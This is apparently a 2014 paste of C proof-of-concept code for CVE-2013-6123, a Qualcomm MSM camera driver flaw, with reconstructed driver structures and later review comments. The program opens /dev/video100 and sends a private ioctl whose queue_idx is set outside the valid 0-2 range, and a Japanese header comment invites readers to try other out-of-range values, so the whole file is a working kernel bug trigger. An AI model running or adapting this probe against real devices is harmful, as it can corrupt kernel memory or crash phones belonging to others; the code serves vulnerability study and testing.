cubecube

CVE-2013-6123 テストコード

Mar 8th, 2014
  1. /*
  2. CVE-2013-6123 のテストコード。
  3. u_isp_event.isp_data.ctrl.queue_idx = 3
  4. の値を0~2以外にして遊んでみてください。
  5. */
  6.  
  7. #include <stdio.h>
  8. #include <stdint.h>
  9. #include <stdlib.h>
  10. #include <unistd.h>
  11. #include <fcntl.h>
  12. #include <string.h>
  13. #include <errno.h>
  14. #include <sys/ioctl.h>
  15.  
  /* Device node opened by attack_msm_cam_server(). */
  #define DEVVIDEO "/dev/video100"

  #define BASE_VIDIOC_PRIVATE 192 /* 192-255 are private */
  /*
   * Read/write ioctl request: type 'V', number BASE_VIDIOC_PRIVATE + 5, taking
   * a struct msm_camera_v4l2_ioctl_t as its argument.
   */
  #define MSM_CAM_V4L2_IOCTL_GET_EVENT_PAYLOAD \
  _IOWR('V', BASE_VIDIOC_PRIVATE + 5, struct msm_camera_v4l2_ioctl_t)

  /* Number of entries in the mp[] plane array of struct msm_pp_frame. */
  #define MAX_PLANES 8
  23.  
  /*
   * Argument block handed to MSM_CAM_V4L2_IOCTL_GET_EVENT_PAYLOAD.
   * In this file only ioctl_ptr is assigned before the ioctl is issued; it is
   * pointed at a struct msm_isp_event_ctrl.
   * NOTE(review): __user is a kernel-side address-space annotation and no
   * userspace definition of it is visible in this listing -- presumably the
   * declaration was copied from the driver header; confirm how it is meant to
   * build.
   */
  struct msm_camera_v4l2_ioctl_t {
      uint32_t id;
      uint32_t len;
      int32_t trans_code;
      void __user *ioctl_ptr; /* address of the payload structure */
  };
  30.  
  /*
   * Control-command record; one of the members of the isp_data union in
   * struct msm_isp_event_ctrl. The probe in this file writes only queue_idx.
   * NOTE(review): presumably mirrors the driver's own definition, so field
   * order and types should be left as they are -- verify against the driver
   * header.
   */
  struct msm_ctrl_cmd {
      uint16_t type;
      uint16_t length;
      void *value;
      uint16_t status;
      uint32_t timeout_ms;
      int resp_fd; /* FIXME: to be used by the kernel, pass-through for now */
      int vnode_id; /* video dev id. Can we overload resp_fd? */
      /*
       * Caller-supplied signed index. The header comment of this file treats
       * 0-2 as the in-range values; the probe sets 3.
       * NOTE(review): looks like an index into a driver-side queue table that
       * must be range-checked by the receiver -- confirm against the driver.
       */
      int queue_idx;
      uint32_t evt_id;
      uint32_t stream_type; /* used to pass value to qcamera server */
      int config_ident; /*used as identifier for config node*/
  };
  44.  
  /*
   * Event/message record; a member of the isp_data union in
   * struct msm_isp_event_ctrl. No field of it is written by this file; it is
   * present so the union has the intended size and layout.
   */
  struct msm_cam_evt_msg {
      unsigned short type; /* 1 == event (RPC), 0 == message (adsp) */
      unsigned short msg_id;
      unsigned int len; /* size in, number of bytes out */
      uint32_t frame_id;
      void *data;
      struct timespec timestamp;
  };
  53.  
  /*
   * Buffer description used as the `sp` arm of the anonymous union in
   * struct msm_pp_frame (the arm that num_planes' comment labels "sp").
   * Not referenced directly by the probe.
   */
  struct msm_pp_frame_sp {
      /* phy addr of the buffer */
      unsigned long phy_addr;
      uint32_t y_off;
      uint32_t cbcr_off;
      /* buffer length */
      uint32_t length;
      int32_t fd;
      uint32_t addr_offset;
      /* mapped addr */
      unsigned long vaddr;
  };
  66.  
  /*
   * Per-plane buffer description; struct msm_pp_frame holds an array of
   * MAX_PLANES of these as the `mp` arm of its anonymous union.
   * Not referenced directly by the probe.
   */
  struct msm_pp_frame_mp {
      /* phy addr of the plane */
      unsigned long phy_addr;
      /* offset of plane data */
      uint32_t data_offset;
      /* plane length */
      uint32_t length;
      int32_t fd;
      uint32_t addr_offset;
      /* mapped addr */
      unsigned long vaddr;
  };
  79.  
  /*
   * Frame descriptor embedded in struct msm_cam_evt_divert_frame.
   * The anonymous union overlays the single-buffer form (sp) with the
   * MAX_PLANES-entry per-plane form (mp), so the structure is sized by the
   * larger of the two.
   */
  struct msm_pp_frame {
      uint32_t handle; /* stores vb cookie */
      uint32_t frame_id;
      unsigned short buf_idx;
      int path;
      unsigned short image_type;
      unsigned short num_planes; /* 1 for sp */
      struct timeval timestamp;
      union {
          struct msm_pp_frame_sp sp;
          struct msm_pp_frame_mp mp[MAX_PLANES];
      };
      int node_type;
      uint32_t inst_handle;
  };
  95.  
  /*
   * Divert-frame record; a member of the isp_data union in
   * struct msm_isp_event_ctrl. It embeds a full struct msm_pp_frame.
   * Not written by the probe.
   */
  struct msm_cam_evt_divert_frame {
      unsigned short image_mode;
      unsigned short op_mode;
      unsigned short inst_idx;
      unsigned short node_idx;
      struct msm_pp_frame frame;
      int do_pp;
  };
  104.  
  /*
   * Acknowledgement record carried as the only arm of the anonymous union in
   * struct msm_mctl_pp_event_info. Not written by the probe.
   */
  struct msm_mctl_pp_cmd_ack_event {
      uint32_t cmd; /* VPE_CMD_ZOOM? */
      int status; /* 0 done, < 0 err */
      uint32_t cookie; /* daemon's cookie */
  };
  110.  
  /*
   * Event code plus its payload; a member of the isp_data union in
   * struct msm_isp_event_ctrl. The anonymous union currently has a single
   * arm (ack). Not written by the probe.
   */
  struct msm_mctl_pp_event_info {
      int32_t event;
      union {
          struct msm_mctl_pp_cmd_ack_event ack;
      };
  };
  117.  
  /*
   * Payload structure whose address the probe stores in
   * msm_camera_v4l2_ioctl_t.ioctl_ptr. resptype is followed by a union of the
   * four record types declared above; the probe fills in only
   * isp_data.ctrl.queue_idx.
   * NOTE(review): resptype is never set in this file, so which union arm the
   * receiver interprets is not shown here -- confirm against the driver.
   */
  struct msm_isp_event_ctrl {
      unsigned short resptype;
      union {
          struct msm_cam_evt_msg isp_msg;
          struct msm_ctrl_cmd ctrl;
          struct msm_cam_evt_divert_frame div_frame;
          struct msm_mctl_pp_event_info pp_event_info;
      } isp_data;
  };
  127.  
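  /*
   * Test probe for CVE-2013-6123: opens DEVVIDEO read-only and issues
   * MSM_CAM_V4L2_IOCTL_GET_EVENT_PAYLOAD with isp_data.ctrl.queue_idx set to
   * 3, a value outside the 0-2 range that the header comment of this file
   * names as the normal one.
   *
   * The outcome of the ioctl is only reported on stderr.
   * NOTE(review): a receiver that range-checks queue_idx would be expected to
   * fail the request with an error; the exact errno is not shown in this
   * file -- confirm against the fixed driver.
   *
   * Returns -1 if DEVVIDEO cannot be opened, 0 otherwise (an ioctl failure
   * does not change the return value).
   */
  int attack_msm_cam_server() {
      int fd;
      int ret;
      struct msm_camera_v4l2_ioctl_t arg;
      struct msm_isp_event_ctrl u_isp_event;

      /*
       * Clear both structures first: only one field of each is assigned
       * below, and without this the remaining bytes handed to the ioctl would
       * be indeterminate stack contents, making runs non-reproducible.
       */
      memset(&arg, 0, sizeof arg);
      memset(&u_isp_event, 0, sizeof u_isp_event);

      fd = open(DEVVIDEO, O_RDONLY);
      if (fd < 0) {
          fprintf(stderr, "%s open error %s.\n", DEVVIDEO, strerror(errno));
          return -1;
      }
      fprintf(stderr, "%s open OK!\n", DEVVIDEO);

      /* The out-of-range index under test (see the file header comment). */
      u_isp_event.isp_data.ctrl.queue_idx = 3;
      arg.ioctl_ptr = (void *)&u_isp_event;
      ret = ioctl(fd, MSM_CAM_V4L2_IOCTL_GET_EVENT_PAYLOAD, &arg);
      if (ret < 0) {
          fprintf(stderr, "ioctl error: %s.\n", strerror(errno));
      }

      close(fd);

      return 0;
  }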
  152.  
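  /*
   * Entry point: runs the probe once. Command-line arguments are not used.
   * The exit status is EXIT_FAILURE when attack_msm_cam_server() reports
   * that the device node could not be opened, so a calling script can tell
   * "probe did not run" apart from "probe ran"; otherwise EXIT_SUCCESS.
   */
  int main(int argc, char **argv) {
      (void)argc;
      (void)argv;

      if (attack_msm_cam_server() < 0) {
          return EXIT_FAILURE;
      }
      return EXIT_SUCCESS;
  }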